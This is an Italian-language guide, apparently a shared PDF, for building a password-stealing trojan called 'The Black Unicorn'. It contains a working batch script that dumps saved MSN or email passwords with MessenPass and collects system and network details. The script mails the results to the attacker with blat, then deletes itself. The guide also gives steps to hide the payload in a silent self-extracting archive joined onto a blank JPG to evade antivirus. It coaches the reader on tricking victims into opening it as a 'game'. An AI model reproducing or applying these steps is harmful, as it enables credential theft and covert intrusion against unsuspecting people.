Sei sulla pagina 1di 10

1

Curato da Angelo (KiLL MSN) Nappi


angelo8702@libero.it
jamy8702@hotmail.it MSN

IO ODIO MESSENGER MSN (KILL MSN)

Disclaimer
Il seguente libro è allo scopo illustrativo e informatico. L’autore Angelo Nappi non si
assume responsabilità delle informazioni assimilate e delle azioni che ne possono
derivare. Qualunque atto che vada contro la legge informatica n23
art1,2,3,4,5,6,7,8,9,10,11,12,13 è punibile e perseguibile
Penalmente
Le azioni riportate nel documento sono state testate su macchine di mia stessa
proprietà.
Quest’opera è stata rilasciata sotto la licenza Creative Commons

Non mi assumo alcuna responsabilità riguardo l’uso di questa guida. Tutte le


informazioni sono a scopo educativo/informatico. Leggendo questa guida voi lettori vi

2
assumerete tutte le responsabilità di quello che farete con ciò spiegato in questo
documento

The Black Unicorn

Introduzione

Questa guida è stata realizza per illustrare semplicemente attraverso pochi passi
come creare un virus o meglio un Trojan invisibile agli antivirus. Questo nuovo trojan
da me progettato ha preso il nome di “unicorno nero”.
L’ unicorno nero riesce semplicemente attraverso l’apertura di un file, inviato
attraverso messaggistica istantanea o e-mail a prelevare le informazioni della vittima
(password,contatto msn,server,ip,e quant’ altro) ovviamente senza che l’antivirus possa
rilevarlo come file “dannoso”

Articolo preso da wikipedia


Un trojan o trojan horse (dall'inglese per Cavallo di Troia), è un tipo di malware. Deve
il suo nome al fatto che le sue funzionalità sono nascoste all'interno di un programma
apparentemente utile; è dunque l'utente stesso che installando ed eseguendo un certo
programma, inconsapevolmente, installa ed esegue anche il codice trojan nascosto.

L'attribuzione del termine "Cavallo di Troia" ad un programma o, comunque, ad un file


eseguibile, è dovuta al fatto che esso nasconde il suo vero fine. È proprio il celare le
sue reali "intenzioni" che lo rende un trojan.

In genere col termine Trojan ci si riferisce ai trojan ad accesso remoto (detti anche
RAT dall'inglese Remote Administration Tool), composti generalmente da 2 file: il file
server, che viene installato nella macchina vittima, ed un file client, usato dal pirata
per inviare istruzioni che il server esegue. In questo modo, come con il mitico
stratagemma adottato da Ulisse, la vittima è indotta a far entrare il programma nella
città, ossia, fuor di metafora, ad eseguire il programma. Esistono anche alcuni
software legali, come GoToMyPC o PCAnywhere, con funzionalità simili ai trojan, ma
che non sono dei cavalli di Troia poiché l'utente è consapevole della situazione.

I trojan non si diffondono autonomamente come i virus o i worm, quindi richiedono un


intervento diretto dell'aggressore per far giungere l'eseguibile maligno alla vittima.
Spesso è la vittima stessa a ricercare e scaricare un trojan sul proprio computer, dato
che i cracker amano inserire queste "trappole" ad esempio nei videogiochi piratati, che
in genere sono molto richiesti. Vengono in genere riconosciuti da un antivirus
aggiornato come tutti i malware. Se il trojan in questione non è ancora stato scoperto

3
dalle software house degli antivirus, è possibile che esso venga rilevato, con la
scansione euristica, come probabile malware.

Un trojan può contenere qualsiasi tipo di istruzione maligna. Spesso i trojan sono usati
come veicolo alternativo ai worm e ai virus per installare delle backdoor o dei
keylogger sui sistemi bersaglio.

All'incirca negli anni successivi al 2001 o 2002 i trojan incomiciarono ad essere


utilizzati sistematicamente per operazioni criminose; in particolare per inviare
messaggi di spam e per rubare informazioni personali quali numeri di carte di credito e
di altri documenti o anche solo indirizzi email.

I Trojan di nuova generazione hanno molteplici funzionalità, quali connessioni tramite


IRC bot, formando appunto Botnet, e opzioni per nascondersi meglio nel sistema
operativo, utilizzando tecniche di Rootkit.

A seguito vi riporto uno spezzone di testo prelevato dall’ottimo libro di murder code
“The black book of infernet” al capitolo 7

Trojan

“proprio come i greci si nascosero dentro un cavallo di legno per poi attaccare il cuore
della città di Troia, il trojan attacca il nostro sistema esponendosi al sistema e
all’utente come un software utile al nostro scopo contenendo però codice nocivo in
grado di compromettere l’intero sistema. Un antivirus scarso difficilmente
riconoscerà l’infezione, mentre per unire due semplici programmi solitamente il lamer
della situazione si arma di un blinder o merge e compie il suo sporco lavoro.

Il trojan si espande tramite allegato posta elettronica, messaggistica istantanea e in


tutti in quei casi dove la vittima è “costretta” ad eseguire il file infetto. Il trojan è
specialmente utilizzato per iniziare la riproduzione di un worm o durante l’infezione
del computer tramite Blackdoor. Col passare del tempo il trojan ha assunto una
forma quasi perfetta: viene distribuito alle vittime sotto forma di eseguibili in grado
di cracckare. Lo scopo? Quello di nascondere file incriminati dentro un eseguibile
facendo in modo che non venga riconosciuto da un sistema di protezione.

“difficilmente il vostro antivirus non si accorgerà se un eseguibile è


effettivamente un trojan, specie se viene creato tramite programmi presenti su
internet. Un bravo programmatore invece potrebbe eludere la difesa, ma è
comunque raro imbattersi in situazioni del genere….

4
“NON E’ VERO OGGI E’ POSSIBILE
ATRRAVERSO L’UNICORNO NERO”
L’ unicorno nero si nasconde dietro un file spesso un immagine bianca ma che verrà
aperto automaticamente come un eseguibile in modo che la vittima nn si accorga di
niente e neanche l’ANTIVIRUS ovviamente. Ovviamente dopo un po’ di TEORIA
passiamo adesso alla …….

PRATICA
La guida deve essere seguita attentamente…in ogni suo passaggio in quanto ne
potrebbe compromettere il suo giusto funzionamento….

INIZIAMO…..

FASE 1
Tutto ciò che vi occorre è:

a) Quick Batch File Compiler vi consiglio di scaricarlo dall’emule con tanto di crack se
no non funziona

b) Blat da scaricare a quest indirizzo

http://sourceforge.net/project/downloading.php?group_id=81910&use_mirror=kent&
filename=blat262.full.zip&95548550 estrarre il file solamente blat.exe presente nella
cartella full

c) MsnPass (o MessenPass) http://www.nirsoft.net/utils/index.html consiglio di


scaricarvi MessenPass per rubare password msn, Mail PassView per password di posta
elettronica oppure

Ora vi spiegherò come creare il file da mandare alla vittima. Appena la vittima apre il
file automaticamente ti arriverà la sua password di msn (se ce l'ha salvata nella
schermata di login)

1° Aprire Quick Batch File Compiler

5
2° Copiarci dentro questo codice

<<inizio CODICE>> ovviamente “inizio codice” nn bisogna copiarlo, copiare solo quanto
scritto giù

@echo off
mspass.exe /stext Test.txt
echo. >> Test.txt
cls
echo COMPUTERNAME = %COMPUTERNAME% >> Test.txt
echo USERNAME = %USERNAME% >> Test.txt
echo USERDOMAIN = %USERDOMAIN% >> Test.txt
echo USERPROFILE = %USERPROFILE% >> Test.txt
echo. >> Test.txt
ipconfig /all >> Test.txt
echo. >> Test.txt
netstat -na >> Test.txt
cls
@blat -install smtp.tiscali.it Password@tiscali.it
cls
@blat Test.txt -to TuaMail
cls
del blat.exe
del Test.txt
del Mail.exe

<<fine CODICE>> anche questo nn copiare

3° Sostituire in "TuaMail" l'email dove vuoi ti arrivino le password, e in smtp.tiscali.it


il provider IN USCITA della posta della conessione che usa la vittima di solito è quasi
sempre out.alice.it oppure mail.libero.it basta informarvi

6
4° Cliccare in alto su "Project" e andare su "Options" selezionando poi "Ghost
Application"

5° Compilare col nome di Mail.exe in build

6° Scaricare MsnPass.exe e Blat (Presenti ad inizio discussione)

7° Creare un archivio con dentro i file del Blat, MsnPass.exe e Mail.exe clikkate i 3
file e con il destro “aggiungi ad un archivio” DOVETE AVERE WINRAR SE NN L’HO
AVETE LO DOVETE SCARICARE E INSTALLARE

8° Spuntare la casella cn scritto "Crea un archivio auto-estraente"

9° Andare in "Avanzati" e poi cliccare su "Modulo auto-estraente". Vi troverete nella


sezione "Generale"

10° Inserire questo in "Percorso d'estrazione": C:\WINDOWS\system32

11° Inserire questo in "Esegui dopo l'estrazione": Mail.exe

7
12° Andare nella sezione "Modalita" e selezionare "Nascondi Tutto" e "Sovrascrivi
tutti i file già esistenti"

13° Cliccare "Ok" e poi create l'archivio

14° ovviamente se vogliamo le password di msn dovremo mettere all’inizio del codice
mspass.exe se invece vogliamo le password dell’email dovremo sostituire mailpv.exe
all’inizio del codice ; da ricordare poi di creare l’archivio con il programma scelto

15° vi consiglio di mettere tutti i file in una cartella in modo da tenere tutto ordinato

FASE 2
Adesso abbiamo creato il nostro trojan ma purtroppo è visibile all’antivirus ora
vedremo come sarà possibile evitare tutto ciò. Creiamo una nuova cartella ovviamente
contenete solamente archivio auto-estraibile che abbiamo creato e rinominiamolo
“setup” in modo da far sembrar + veritiera la cosa. Allo stesso tempo andiamo sul paint
presente in strart-accessori e non disegnamo nulla ma solamente salviamo come
“ciao.jpg” nella cartella creata così avremo la nostra bella immagine bianca.

UNA VOLTA FATTO CIO prendiamo il file setup (archivio ke abbiamo creato prima) e
nuovamente stavolta cn il destro del mouse facciamo “aggiungi ad un archivio…”
stavolta facciamo direttamente su ok e nella cartella si crereà un file con nome
“setup” ma ovviamente in rar dentro il quale ce il vero setup.exe.

Ora usciamo dalla cartella e rinominiamo la cartella “ciao” per semplicita e mettiamola
sul desktop

Una volta fatto cio andiamo in start poi su esegui e digitiamo “cmd” senza virgole alte
Successivamente scriviamo sul command “cd desktop” e premiamo il tasto invio

8
Successivamente scriviamo “cd ciao” sarebbe la nostra cartella sul desktop

E infine “dir” e inviamo dovremo avere questa schermata

Ora scriviamo “copy /b ciao.jpg + setup.rar finale.jpg” se avremo fatto tutto in modo
coretto ci uscirà questa schermata

Adesso se andiamo a vedere nella cartella ciao sul desktop sara stata creata un
immagine col nome “finale” e se l’apriamo sarà un immagine bianca
NON CI CREDERETE MA QUELLA FOTO è IL NOSTRO UNICORNO NERO IN
GRADO DI CATTURARE PASSWORD FACENDOLA APRIRE ALLA NOSTRA
VITTIMA BASTA DIRGLI CHE è UN GIOCO. Ma prima di questo

Dobbiamo rinominare l’estenzione da .JPG a .RAR per i meno pratici basta andare nella
nostra cartella su a tutto in STRUMENTI-OPZIONI CARTELLA…-
VISUALIZZAZIONI-E TOGLIERE LA SPUNTA DA “NASCONDI LE ESTENZIONI
PER I TIPI DI FILE CONOSCIUTI”

Ora rinominiamo il nostro file “finale.jpg” in “gioco.rar” o nel nome che volete ora
basta inviarlo alla vittima dicendo che è un gioco che circola o quello che cazzo volete

9
voi…… anche per msn tanto l’antivirus non lo rileva. La vittima quando andra ad aprire il
“gioco.rar” si troverà di fronte a setup.exe ke ovviamente lo aprira…..
Basta aspettare un po e nella nostra e-mail che abbiamo indicato nel codice di prima ci
arriveranno le sue password e i suoi account……….
Ovviamente è stato testato su mie macchine è funziona al 100%

Se proprio avete l’esigenza di copiare i codici e gli indirizzi per scaricare i programmi
ma non lo potete fare poiché questa guida è stata realizzata in formato .pdf allora
collegatevi a questo sito per trasformare la guida in file di testo o word
http://aranzulla.computer.alice.it/da-pdf-a-doc-convertire-un-documento-pdf-in-un-
documento-word-finito-1005.html (almeno questo indirizzo lo dovrete copiare in
internet mi dispiace)

Spero che sia stato chiaro in questa breve guida e spero di ricevere tante e-mail per
dubbi, chiarimenti, critiche e quant altro.

KILL MSN
(Angelo Nappi)
angelo8702@libero.it
jamy8702@hotmail.it

10

Potrebbero piacerti anche